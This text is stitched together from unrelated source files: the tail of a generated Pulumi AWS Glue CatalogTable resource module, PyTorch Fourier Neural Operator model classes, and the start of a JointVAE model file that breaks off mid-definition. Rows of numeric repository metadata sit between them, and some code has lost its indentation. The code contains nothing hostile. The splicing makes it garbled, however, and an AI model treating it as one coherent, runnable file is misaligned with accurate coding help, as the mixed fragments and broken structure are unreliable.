* `outputFormat` (`pulumi.Input[str]`) - The output format: SequenceFileOutputFormat (binary), or IgnoreKeyTextOutputFormat, or a custom format.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serDeInfo` (`pulumi.Input[dict]`) - Serialization/deserialization (SerDe) information.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serializationLibrary` (`pulumi.Input[str]`) - Usually the class that implements the SerDe. An example is: org.apache.hadoop.hive.serde2.columnar.ColumnarSerDe.
* `skewedInfo` (`pulumi.Input[dict]`) - Information about values that appear very frequently in a column (skewed values).
* `skewedColumnNames` (`pulumi.Input[list]`) - A list of names of columns that contain skewed values.
* `skewedColumnValueLocationMaps` (`pulumi.Input[dict]`) - A list of values that appear so frequently as to be considered skewed.
* `skewedColumnValues` (`pulumi.Input[list]`) - A mapping of skewed values to the columns that contain them.
* `sortColumns` (`pulumi.Input[list]`) - A list of Order objects specifying the sort order of each bucket in the table.
* `column` (`pulumi.Input[str]`) - The name of the column.
* `sortOrder` (`pulumi.Input[float]`) - Indicates that the column is sorted in ascending order (== 1), or in descending order (==0).
* `storedAsSubDirectories` (`pulumi.Input[bool]`) - True if the table data is stored in subdirectories, or False if not.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glue_catalog_table.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['catalog_id'] = catalog_id
if database_name is None:
raise TypeError("Missing required property 'database_name'")
__props__['database_name'] = database_name
__props__['description'] = description
__props__['name'] = name
__props__['owner'] = owner
__props__['parameters'] = parameters
__props__['partition_keys'] = partition_keys
__props__['retention'] = retention
__props__['storage_descriptor'] = storage_descriptor
__props__['table_type'] = table_type
__props__['view_expanded_text'] = view_expanded_text
__props__['view_original_text'] = view_original_text
super(CatalogTable, __self__).__init__(
'aws:glue/catalogTable:CatalogTable',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, catalog_id=None, database_name=None, description=None, name=None, owner=None, parameters=None, partition_keys=None, retention=None, storage_descriptor=None, table_type=None, view_expanded_text=None, view_original_text=None):
"""
Get an existing CatalogTable resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] catalog_id: ID of the Glue Catalog and database to create the table in. If omitted, this defaults to the AWS Account ID plus the database name.
:param pulumi.Input[str] database_name: Name of the metadata database where the table metadata resides. For Hive compatibility, this must be all lowercase.
:param pulumi.Input[str] description: Description of the table.
:param pulumi.Input[str] name: Name of the SerDe.
:param pulumi.Input[str] owner: Owner of the table.
:param pulumi.Input[dict] parameters: A map of initialization parameters for the SerDe, in key-value form.
:param pulumi.Input[list] partition_keys: A list of columns by which the table is partitioned. Only primitive types are supported as partition keys.
:param pulumi.Input[float] retention: Retention time for this table.
:param pulumi.Input[dict] storage_descriptor: A storage descriptor object containing information about the physical storage of this table. You can refer to the [Glue Developer Guide](https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-tables.html#aws-glue-api-catalog-tables-StorageDescriptor) for a full explanation of this object.
:param pulumi.Input[str] table_type: The type of this table (EXTERNAL_TABLE, VIRTUAL_VIEW, etc.).
:param pulumi.Input[str] view_expanded_text: If the table is a view, the expanded text of the view; otherwise null.
:param pulumi.Input[str] view_original_text: If the table is a view, the original text of the view; otherwise null.
The **partition_keys** object supports the following:
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
The **storage_descriptor** object supports the following:
* `bucketColumns` (`pulumi.Input[list]`) - A list of reducer grouping columns, clustering columns, and bucketing columns in the table.
* `columns` (`pulumi.Input[list]`) - A list of the Columns in the table.
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
* `compressed` (`pulumi.Input[bool]`) - True if the data in the table is compressed, or False if not.
* `inputFormat` (`pulumi.Input[str]`) - The input format: SequenceFileInputFormat (binary), or TextInputFormat, or a custom format.
* `location` (`pulumi.Input[str]`) - The physical location of the table. By default this takes the form of the warehouse location, followed by the database location in the warehouse, followed by the table name.
* `numberOfBuckets` (`pulumi.Input[float]`) - Must be specified if the table contains any dimension columns.
* `outputFormat` (`pulumi.Input[str]`) - The output format: SequenceFileOutputFormat (binary), or IgnoreKeyTextOutputFormat, or a custom format.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serDeInfo` (`pulumi.Input[dict]`) - Serialization/deserialization (SerDe) information.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `parameters` (`pulumi.Input[dict]`) - A map of initialization parameters for the SerDe, in key-value form.
* `serializationLibrary` (`pulumi.Input[str]`) - Usually the class that implements the SerDe. An example is: org.apache.hadoop.hive.serde2.columnar.ColumnarSerDe.
* `skewedInfo` (`pulumi.Input[dict]`) - Information about values that appear very frequently in a column (skewed values).
* `skewedColumnNames` (`pulumi.Input[list]`) - A list of names of columns that contain skewed values.
* `skewedColumnValueLocationMaps` (`pulumi.Input[dict]`) - A list of values that appear so frequently as to be considered skewed.
* `skewedColumnValues` (`pulumi.Input[list]`) - A mapping of skewed values to the columns that contain them.
* `sortColumns` (`pulumi.Input[list]`) - A list of Order objects specifying the sort order of each bucket in the table.
* `column` (`pulumi.Input[str]`) - The name of the column.
* `sortOrder` (`pulumi.Input[float]`) - Indicates that the column is sorted in ascending order (== 1), or in descending order (==0).
* `storedAsSubDirectories` (`pulumi.Input[bool]`) - True if the table data is stored in subdirectories, or False if not.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glue_catalog_table.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["catalog_id"] = catalog_id
__props__["database_name"] = database_name
__props__["description"] = description
__props__["name"] = name
__props__["owner"] = owner
__props__["parameters"] = parameters
__props__["partition_keys"] = partition_keys
__props__["retention"] = retention
__props__["storage_descriptor"] = storage_descriptor
__props__["table_type"] = table_type
__props__["view_expanded_text"] = view_expanded_text
__props__["view_original_text"] = view_original_text
return CatalogTable(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
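# Hedged usage sketch (not part of the generated file): declaring a minimal
# Glue catalog table with the CatalogTable resource defined above. This only
# runs inside a Pulumi program; the names and S3 location are illustrative.
def _example_catalog_table():
    return CatalogTable(
        "example-table",
        database_name="example_database",      # required property
        name="example_table",
        table_type="EXTERNAL_TABLE",
        storage_descriptor={
            "columns": [{"name": "id", "type": "string"}],
            "location": "s3://example-bucket/example-prefix/",
        })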
| 66.476868
| 352
| 0.676767
| 2,393
| 18,680
| 5.159632
| 0.115336
| 0.067709
| 0.045355
| 0.024621
| 0.864906
| 0.852515
| 0.843363
| 0.829675
| 0.821414
| 0.820604
| 0
| 0.000691
| 0.225268
| 18,680
| 280
| 353
| 66.714286
| 0.852474
| 0.529979
| 0
| 0.026316
| 1
| 0
| 0.149606
| 0.008366
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0.013158
| 0.078947
| 0.026316
| 0.342105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
587357f0302b1d29d4d84210c770bc49f320507b
| 17,753
|
py
|
Python
|
models/FNO.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
models/FNO.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
models/FNO.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# import torch.fft as fft
# from torch.nn.parameter import Parameter
class SpectralConv1d(nn.Module):
def __init__(self, in_channels, out_channels, modes1):
super(SpectralConv1d, self).__init__()
"""
1D Fourier layer. It does FFT, linear transform, and Inverse FFT.
"""
self.in_channels = in_channels
self.out_channels = out_channels
self.modes1 = modes1 #Number of Fourier modes to multiply, at most floor(N/2) + 1
self.scale = (1 / (in_channels*out_channels))
self.weights1 = nn.Parameter(self.scale * torch.rand(in_channels, out_channels, self.modes1, dtype=torch.cfloat))
# Complex multiplication
def compl_mul1d(self, input, weights):
# (batch, in_channel, x ), (in_channel, out_channel, x) -> (batch, out_channel, x)
return torch.einsum("bix,iox->box", input, weights)
def forward(self, x):
batchsize = x.shape[0]
# Compute Fourier coefficients up to factor of e^(- something constant)
x_ft = torch.fft.rfft(x)
# Multiply relevant Fourier modes
out_ft = torch.zeros(batchsize, self.out_channels, x.size(-1)//2 + 1, device=x.device, dtype=torch.cfloat)
out_ft[:, :, :self.modes1] = self.compl_mul1d(x_ft[:, :, :self.modes1], self.weights1)
#Return to physical space
x = torch.fft.irfft(out_ft, n=x.size(-1))
return x
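# Hedged shape-check sketch (not part of the original file): SpectralConv1d maps
# (batch, in_channels, n) -> (batch, out_channels, n), keeping only the lowest
# `modes1` Fourier modes. The channel and grid sizes below are illustrative.
def _demo_spectral_conv1d():
    layer = SpectralConv1d(in_channels=3, out_channels=5, modes1=8)
    x = torch.randn(2, 3, 64)        # (batch, in_channels, grid points)
    y = layer(x)
    assert y.shape == (2, 5, 64)     # same grid size, new channel count
    return y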
class FNO1dComplexTime(nn.Module):
def __init__(self, modes, width):
super(FNO1dComplexTime, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desired channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (Re(a(x)), Im(a(x)), x), plus a scalar time t appended as a fourth channel inside forward
input shape: (batchsize, x=s, c=3), together with the time argument t
output: the solution of a later timestep
output shape: (batchsize, x=s, c=2)
"""
self.modes1 = modes
self.width = width
self.fc0 = nn.Linear(4, self.width) # input channel is 4: (Re(a(x)), Im(a(x)), x, t)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 2)
def forward(self, x, t):
# print("INPUT X SHAPE: {} DTYPE: {}".format(x.shape, x.dtype))
# print("INPUT T SHAPE: {} DTYPE: {}".format(t.shape, t.dtype))
# print("T: {}".format(t))
# print("T0: {}".format(t[0]))
# print("T1: {}".format(t[1]))
# print("INPUT T SHAPE: {} DTYPE: {}".format(t.shape, t.dtype))
# o = torch.ones((1, x.size()[1]), dtype = torch.float)
# print("INPUT O SHAPE: {} DTYPE: {}".format(o.shape, o.dtype))
# t_arr = torch.matmul(t, o)
t = t.view(-1, 1, 1).repeat([1, x.shape[1], 1])
x = torch.cat([x, t], dim=2)
x = self.fc0(x)
x = x.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return torch.view_as_complex(x)
class FNO1dComplex(nn.Module):
def __init__(self, modes, width):
super(FNO1dComplex, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desired channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (Re(a(x)), Im(a(x)), x)
input shape: (batchsize, x=s, c=3)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=2)
"""
self.modes1 = modes
self.width = width
self.fc0 = nn.Linear(3, self.width) # input channel is 3: (Re(a(x)), Im(a(x)), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 2)
def forward(self, x):
x = self.fc0(x)
x = x.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return torch.view_as_complex(x)
class FNO1dReal(nn.Module):
def __init__(self, modes, width):
super(FNO1dReal, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desired channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
self.fc0 = nn.Linear(2, self.width) # input channel is 2: (a(x), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
x = self.fc0(x)
x = x.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x.squeeze()
class SinEncoder1dReal(nn.Module):
def __init__(self, width):
super(SinEncoder1dReal, self).__init__()
self.width = width
self.max_freq = int(np.floor((self.width - 1) / 2))
self.ones_padding = self.width % 2 == 0
self.freqs = torch.arange(self.max_freq)
LHS = 1 + 2 * self.max_freq + int(self.ones_padding)
assert LHS == self.width, "{} != {}".format(LHS, self.width)
def forward(self, x):
n_batch, n_grid, n_channels = x.shape
y = x[:,:,1].view(n_batch, n_grid, 1) # This is the x column
# print("INTERMEDIATE Y SHAPE", y.shape)
if self.ones_padding:
y = torch.cat([y, torch.ones_like(y)], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
for freq in self.freqs:
x_cos = torch.cos(freq * x[:,:,0].view(n_batch, n_grid, 1))
x_sin = torch.sin(freq * x[:,:,0].view(n_batch, n_grid, 1))
y = torch.cat([y, x_cos, x_sin], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
return y
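# Hedged shape-check sketch (not part of the original file): SinEncoder1dReal
# expands the x-coordinate channel into `width` features: the raw x column,
# an optional ones column when width is even, and a cos/sin pair for each of
# the floor((width - 1) / 2) integer frequencies. Sizes below are illustrative.
def _demo_sin_encoder_real():
    enc = SinEncoder1dReal(width=5)   # 1 (x) + 2*2 (cos/sin of freqs 0 and 1) = 5
    x = torch.randn(2, 16, 2)         # (batch, grid, channels=(a(x), x))
    y = enc(x)
    assert y.shape == (2, 16, 5)
    return y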
class SinEncoder1dComplex(nn.Module):
def __init__(self, width):
super(SinEncoder1dComplex, self).__init__()
self.width = width
self.max_freq = int((self.width - 1) // 4)
self.ones_padding = self.width - self.max_freq * 4 - 1
self.freqs = torch.arange(self.max_freq)
LHS = 1 + 4 * self.max_freq + int(self.ones_padding)
assert LHS == self.width, "{} != {}".format(LHS, self.width)
def forward(self, x):
n_batch, n_grid, n_channels = x.shape
# channels are (Re(a(x)), Im(a(x)), x)
y_orig = x[:,:,2].view(n_batch, n_grid, 1) # This is the x column
y = y_orig
# print("INTERMEDIATE Y SHAPE", y.shape)
for i in range(self.ones_padding):
y = torch.cat([y, torch.ones_like(y_orig)], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
for freq in self.freqs:
x_real_cos = torch.cos(freq * x[:,:,0].view(n_batch, n_grid, 1))
x_real_sin = torch.sin(freq * x[:,:,0].view(n_batch, n_grid, 1))
x_imag_cos = torch.cos(freq * x[:,:,1].view(n_batch, n_grid, 1))
x_imag_sin = torch.sin(freq * x[:,:,1].view(n_batch, n_grid, 1))
y = torch.cat([y, x_real_cos, x_real_sin, x_imag_cos, x_imag_sin], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
return y
class SpectralEncodingFNO1dReal(nn.Module):
def __init__(self, modes, width):
super(SpectralEncodingFNO1dReal, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desired channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
# self.fc0 = nn.Linear(2, self.width) # input channel is 2: (a(x), x)
self.sin_encoder = SinEncoder1dReal(self.width)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
# print("X", x.shape)
# x_fc0 = self.fc0(x)
# print("FC_0", x_fc0.shape)
x_sin = self.sin_encoder(x)
# print("X_SIN", x_sin.shape)
# exit(0)
x = x_sin.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x.squeeze()
class SpectralEncodingFNO1dComplex(nn.Module):
def __init__(self, modes, width):
super(SpectralEncodingFNO1dComplex, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desired channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (Re(a(x)), Im(a(x)), x)
input shape: (batchsize, x=s, c=3)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
# self.fc0 = nn.Linear(2, self.width) # input channel is 2: (Re(a(x)), Im(a(x)), x)
self.sin_encoder = SinEncoder1dComplex(self.width)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
# print("X", x.shape)
# x_fc0 = self.fc0(x)
# print("FC_0", x_fc0.shape)
x_sin = self.sin_encoder(x)
# print("X_SIN", x_sin.shape)
# exit(0)
x = x_sin.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x.squeeze()
class FNO1d(nn.Module):
def __init__(self, modes, width):
super(FNO1d, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desired channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
self.padding = 2 # pad the domain if input is non-periodic
self.fc0 = nn.Linear(2, self.width) # input channel is 2: (a(x), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
grid = self.get_grid(x.shape, x.device)
x = torch.cat((x, grid), dim=-1)
x = self.fc0(x)
x = x.permute(0, 2, 1)
# x = F.pad(x, [0,self.padding]) # pad the domain if input is non-periodic
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
# x = x[..., :-self.padding] # pad the domain if input is non-periodic
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.gelu(x)
x = self.fc2(x)
return x
def get_grid(self, shape, device):
batchsize, size_x = shape[0], shape[1]
gridx = torch.tensor(np.linspace(0, 1, size_x), dtype=torch.float)
gridx = gridx.reshape(1, size_x, 1).repeat([batchsize, 1, 1])
return gridx.to(device)
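# Hedged usage sketch (not part of the original file): running the plain FNO1d
# on a batch of 1D functions. FNO1d concatenates its own coordinate grid in
# forward, so the input carries a single a(x) channel; sizes are illustrative.
def _demo_fno1d():
    model = FNO1d(modes=16, width=32)
    a = torch.randn(4, 128, 1)        # (batch, grid points, channels=a(x))
    u = model(a)                      # the x grid is appended inside forward
    assert u.shape == (4, 128, 1)
    return u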
| 34.074856
| 121
| 0.562215
| 2,669
| 17,753
| 3.671413
| 0.071937
| 0.117563
| 0.0995
| 0.088172
| 0.826513
| 0.808348
| 0.803347
| 0.791407
| 0.764874
| 0.747525
| 0
| 0.046986
| 0.301076
| 17,753
| 521
| 122
| 34.074856
| 0.742747
| 0.099927
| 0
| 0.767974
| 0
| 0
| 0.002274
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 1
| 0.065359
| false
| 0
| 0.013072
| 0.003268
| 0.143791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58748fce3fda71edbb71668eafd0bbb1ce7e065b
| 28,323
|
py
|
Python
|
jointvae/models_custom.py
|
aashishkumar0228/joint-vae
|
6d0d5a19ddb8cb0a1bbe27ec8b8999cc1e177131
|
[
"MIT"
] | null | null | null |
jointvae/models_custom.py
|
aashishkumar0228/joint-vae
|
6d0d5a19ddb8cb0a1bbe27ec8b8999cc1e177131
|
[
"MIT"
] | null | null | null |
jointvae/models_custom.py
|
aashishkumar0228/joint-vae
|
6d0d5a19ddb8cb0a1bbe27ec8b8999cc1e177131
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn, optim
from torch.nn import functional as F
EPS = 1e-12
class VAE_OPERATOR(nn.Module):
def __init__(self, img_size, latent_spec, temperature=.67, use_cuda=False, hidden_dim=64):
"""
Class which defines model and forward pass.
Parameters
----------
img_size : tuple of ints
Size of images. E.g. (1, 32, 32) or (3, 64, 64).
latent_spec : dict
Specifies latent distribution. For example:
{'cont': 10, 'disc': [10, 4, 3]} encodes 10 normal variables and
3 gumbel softmax variables of dimension 10, 4 and 3. A latent spec
can include both 'cont' and 'disc' or only 'cont' or only 'disc'.
temperature : float
Temperature for gumbel softmax distribution.
use_cuda : bool
If True moves model to GPU
"""
super(VAE_OPERATOR, self).__init__()
self.use_cuda = use_cuda
# Parameters
self.img_size = img_size
self.is_continuous = 'cont' in latent_spec
self.is_discrete = 'disc' in latent_spec
self.latent_spec = latent_spec
self.num_pixels = img_size[1] * img_size[2]
self.temperature = temperature
self.hidden_dim = hidden_dim # Hidden dimension of linear layer
self.reshape = (16, 4, 4) # Shape required to start transpose convs
# Calculate dimensions of latent distribution
self.latent_cont_dim = 0
self.latent_disc_dim = 0
self.num_disc_latents = 0
if self.is_continuous:
self.latent_cont_dim = self.latent_spec['cont']
if self.is_discrete:
self.latent_disc_dim += sum([dim for dim in self.latent_spec['disc']])
self.num_disc_latents = len(self.latent_spec['disc'])
self.latent_dim = self.latent_cont_dim + self.latent_disc_dim
# Define encoder layers
# Initial layer
encoder_layers = [
nn.Conv2d(self.img_size[0], 8, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Add additional layer if (64, 64) images
if self.img_size[1:] == (64, 64):
encoder_layers += [
nn.Conv2d(8, 8, (4, 4), stride=2, padding=1),  # match the 8-channel stem above
nn.ReLU()
]
elif self.img_size[1:] == (32, 32):
# (32, 32) images are supported but do not require an extra layer
pass
else:
raise RuntimeError("{} sized images not supported. Only (None, 32, 32) and (None, 64, 64) supported. Build your own architecture or reshape images!".format(img_size))
# Add final layers
encoder_layers += [
nn.Conv2d(8, 16, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 16, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Define encoder
self.img_to_features = nn.Sequential(*encoder_layers)
# Map encoded features into a hidden vector which will be used to
# encode parameters of the latent distribution
self.features_to_hidden = nn.Sequential(
nn.Linear(16 * 4 * 4, self.hidden_dim),
nn.ReLU()
)
# Encode parameters of latent distribution
if self.is_continuous:
self.fc_mean = nn.Linear(self.hidden_dim, self.latent_cont_dim)
self.fc_log_var = nn.Linear(self.hidden_dim, self.latent_cont_dim)
if self.is_discrete:
# Linear layer for each of the categorical distributions
fc_alphas = []
for disc_dim in self.latent_spec['disc']:
fc_alphas.append(nn.Linear(self.hidden_dim, disc_dim))
self.fc_alphas = nn.ModuleList(fc_alphas)
# Map latent samples to features to be used by generative model
self.latent_to_features = nn.Sequential(
nn.Linear(self.latent_dim, self.hidden_dim),
nn.ReLU(),
